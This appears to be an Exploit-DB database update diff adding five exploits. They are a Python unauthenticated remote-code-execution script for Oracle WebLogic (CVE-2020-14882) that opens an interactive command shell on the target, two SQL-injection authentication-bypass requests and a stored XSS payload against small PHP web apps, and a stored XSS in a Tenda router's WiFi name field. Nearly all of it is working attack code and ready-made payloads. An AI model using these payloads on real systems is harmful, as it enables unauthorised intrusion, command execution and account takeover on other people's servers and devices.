DB: 2021-01-27

5 changes to exploits/shellcodes

Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)
Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)
Simple College Website 1.0 - 'full' Stored Cross Site Scripting
Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting
Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)

exploits/hardware/webapps/49478.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting
+# Exploit Author: Chiragh Arora
+# Hardware Model: Tenda AC5 AC1200
+# Firmware version: V15.03.06.47_multi
+# Tested on: Kali Linux
+# CVE ID: CVE-2021-3186
+# Date: 25.01.2021
+
+##########################################################################
+
+Steps to Reproduce -
+
+   - Navigate to the Tenda AC1200 gateway with 192.168.0.1 
+   - Follow up to the WiFi Settings and click the “WiFi Name & Password” option there.
+   - Manipulate the WiFi Name with "<script>alert(1)</script>"
+   - Click the “Save” button & as the page refresh, you’ll got an alert stating “1” within it.
+   
+Note: It doesn’t matter which Network Name parameter (2.4 GHz or 5 GHz) you’re manipulating, you’ll encounter the popup over in both of them.

exploits/java/webapps/49479.py

@@ -0,0 +1,91 @@
+# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)
+# Google Dork: inurl:\\\"/console/login/LoginForm.jsp\\\"
+# Date: 25/1/2021
+# Exploit Author: CHackA0101
+# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html
+# Version: Oracle WebLogic Server, version 12.2.1.0
+# Tested on: Oracle WebLogic Server, version 12.2.1.0 (OS: Linux PDT 2017 x86_64 GNU/Linux)
+# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html
+# CVE : CVE-2020-14882
+
+# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2020-14882/README.md
+
+#!/usr/bin/python3
+
+import requests
+import argparse
+import http.client
+http.client.HTTPConnection._http_vsn = 10
+http.client.HTTPConnection._http_vsn_str = \\\'HTTP/1.0\\\'
+
+parse = argparse.ArgumentParser()
+parse.add_argument(\\\'-u\\\', \\\'--url\\\', help=\\\'url\\\')
+args = parse.parse_args()
+
+proxies = {\\\'http\\\' : \\\'127.0.0.1:8080\\\'}
+cmd_ = \\\"\\\"
+
+# Headers
+headers = {
+	\\\"User-Agent\\\": \\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0\\\",
+	\\\"Accept\\\": \\\"application/json, text/plain, */*\\\",
+	\\\"Accept-Language\\\": \\\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\\",
+	\\\"Accept-Encoding\\\": \\\"gzip, deflate\\\",
+	\\\"Upgrade-Insecure-Requests\\\": \\\"1\\\",
+	\\\"Content-Type\\\": \\\"application/x-www-form-urlencoded\\\",
+	\\\"Cache-Control\\\": \\\"max-age=0\\\",
+	\\\"Connection\\\": \\\"close\\\"
+}
+
+# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation:
+url = args.url + \\\"\\\"\\\"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"java.lang.Runtime.getRuntime().exec();\\\");\\\"\\\"\\\"
+url_ = args.url + \\\"/console/images/%252E%252E%252Fconsole.portal\\\"
+
+form_data_ = \\\"\\\"\\\"_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
+weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
+java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\\"connectionHandler\\\");
+field.setAccessible(true);
+Object obj = field.get(adapter);
+weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\\\"getServletRequest\\\").invoke(obj);
+String cmd = req.getHeader(\\\"cmd\\\");
+String[] cmds = System.getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"window\\\") ? new String[]{\\\"cmd.exe\\\", \\\"/c\\\", cmd} : new String[]{\\\"/bin/sh\\\", \\\"-c\\\", cmd};
+if (cmd != null) {
+    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\\\"\\\\\\\\\\\\A\\\").next();
+    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\\\"getResponse\\\").invoke(req);
+    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
+    res.getServletOutputStream().flush();
+    res.getWriter().write(\\\"\\\");
+}executeThread.interrupt();
+\\\");\\\"\\\"\\\"
+
+#data_ = parse.urlencode(form_data_)
+results1 = requests.get(url, headers=headers)
+
+if results1.status_code == 200:
+	print(\\\"(Load Headers... \\\\n\\\")
+	print(\\\"(Data urlencode... \\\\n\\\")
+	print(\\\"(Execute exploit... \\\\n\\\")
+	print(\\\"(CHackA0101GNU/Linux)$ Successful Exploitation \\\\n\\\")
+	while True:
+		cmd_test = input(\\\"(CHackA0101GNU/Linux)$ \\\")
+		if cmd_test == \\\"exit\\\":
+			break
+		else:
+			try:
+				cmd_ = cmd_test
+				headers = {
+					\\\'cmd\\\': cmd_,
+					\\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\',
+					\\\'User-Agent\\\': \\\'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\',
+					\\\'Accept\\\': \\\'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\\\',
+					\\\'Connection\\\': \\\'close\\\',
+					\\\'Accept-Encoding\\\': \\\'gzip, deflate\\\',
+					\\\'Content-Length\\\': \\\'1244\\\',
+					\\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\'
+				}
+				results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text
+				print(results_)
+			except:
+				pass
+else:
+	print(\\\"(CHackA0101GNU/Linux)$ Fail.\\\\n\\\")

exploits/php/webapps/49475.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)
+# Exploit Author: Marco Catalano
+# Date: 2021-01-25
+# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: 1.0
+# Vulnerable parameter: "user_email" (POST method)
+# Tested on: Linux, PHP/7.4.11
+
+Explaination:
+The userAuthentication function defined in "/include/accounts.php" implements the following code:
+
+$mydb->setQuery("SELECT * FROM `tbluseraccount` WHERE `U_USERNAME` = '". $U_USERNAME ."' and `U_PASS` = '". $h_pass ."'");
+
+which is called when trying to log into the administrative panel at "/admin/login.php".
+
+Proof Of Concept:
+
+The user input is not properly sanitized and this leads to authentication bypass through the classic "<username>' or '1' = '1 -- -" where <username> has to be a valid username. For example, the default username is "janobe".
+
+
+POST /admin/login.php?logout=1 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 69
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/admin/login.php?logout=1
+Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
+Upgrade-Insecure-Requests: 1
+
+user_email=janobe%27+or+%271%27+%3D+%271--+-&user_pass=test&btnLogin=

exploits/php/webapps/49476.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)
+# Exploit Author: Marco Catalano (@stunn4)
+# Date: 2021-01-25
+# Vendor Homepage: https://www.sourcecodester.com/php/7772/simple-college-website-using-php-and-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=7772&title=Simple+College+Website+using++PHP%2FMySQLi+with+Source+Code
+# Affected Version: 1.0
+# Vulnerable parameter: "name" (POST method)
+# Tested on: Linux, PHP/7.4.11
+
+Explaination:
+The source of "/admin_pages/login.php" file defines the following lines of code:
+
+$name=$_POST['name'];
+$password=$_POST['password'];
+$result=mysqli_query($conn,"SELECT * FROM users WHERE name='$name' AND Password='$password'");
+
+which are called when trying to log into the administrative panel at "/admin_pages/login.php" itself.
+
+Proof Of Concept:
+
+The user input is not properly sanitized and this leads to authentication bypass through the classic "<username>' or '1' = '1 -- -" where <username> has to be a valid username. For example, the default username is "florian".
+
+
+POST /admin_pages/login.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 66
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/admin_pages/login.php
+Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
+Upgrade-Insecure-Requests: 1
+
+name=florian%27+or+%271%27+%3D+%271+--+-&password=test&login=Login

exploits/php/webapps/49477.txt

@@ -0,0 +1,48 @@
+# Exploit Title: Simple College Website 1.0 - 'full' Stored Cross Site Scripting
+# Exploit Author: Marco Catalano (@stunn4)
+# Date: 2021-01-25
+# Vendor Homepage: https://www.sourcecodester.com/php/7772/simple-college-website-using-php-and-mysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=7772&title=Simple+College+Website+using++PHP%2FMySQLi+with+Source+Code
+# Affected Version: 1.0
+# Vulnerable parameter: "full" (POST method)
+# Tested on: Linux, PHP/7.4.11
+
+Explaination:
+The source of "/admin_pages/admission.php" file defines the following lines of code:
+
+if (isset($_POST['add'])&&!empty($_POST['full'])) {
+    $full=$_POST['full'];
+    $query=mysqli_query($conn,"UPDATE `contents` SET `full_contents`='$full'  WHERE `id`='2'");
+    if ($query) {
+        echo "<b style='color:white;'>Page changed..!</b>";
+    } else if(!$query){
+        echo "<b style='color:white;'>Page is not changed..!</b>";
+    }
+}
+
+
+which allow to an authenticated administrator to modify the source code of the page.
+Every change is then reflected and the user-input is not properly sanitized, this leads to cross site scripting attacks.
+An attacker may try to gain access to the admin panel using authentication bypass through sql injection exploit.
+
+Proof Of Concept:
+The attacker is logged into the administrator panel and modifies the source code of admission.php page to inject javascript code as it follows:
+
+
+POST /admin_pages/admission.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 71
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/admin_pages/admission.php
+Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj
+Upgrade-Insecure-Requests: 1
+
+full=<script>alert("xss+PoC+by+stunn4")%3b</script>&add=Update+Contents
+
+The XSS payload is stored in the database, so a victim would browse http://127.0.0.1/admission.php and execute the XSS payload.

files_exploits.csv

@@ -43669,3 +43669,8 @@ id,file,description,date,author,type,platform,port
 49470,exploits/php/webapps/49470.txt,"CASAP Automated Enrollment System 1.0 - 'route' Stored XSS",2021-01-25,"Richard Jones",webapps,php,
 49471,exploits/php/webapps/49471.txt,"Library System 1.0 - 'category' SQL Injection",2021-01-25,"Aitor Herrero",webapps,php,
 49474,exploits/php/webapps/49474.rb,"Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)",2021-01-25,"Metin Yunus Kandemir",webapps,php,
+49475,exploits/php/webapps/49475.txt,"Cemetry Mapping and Information System 1.0 - 'user_email' Sql Injection (Authentication Bypass)",2021-01-26,"Marco Catalano",webapps,php,
+49476,exploits/php/webapps/49476.txt,"Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass)",2021-01-26,"Marco Catalano",webapps,php,
+49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
+49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
+49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,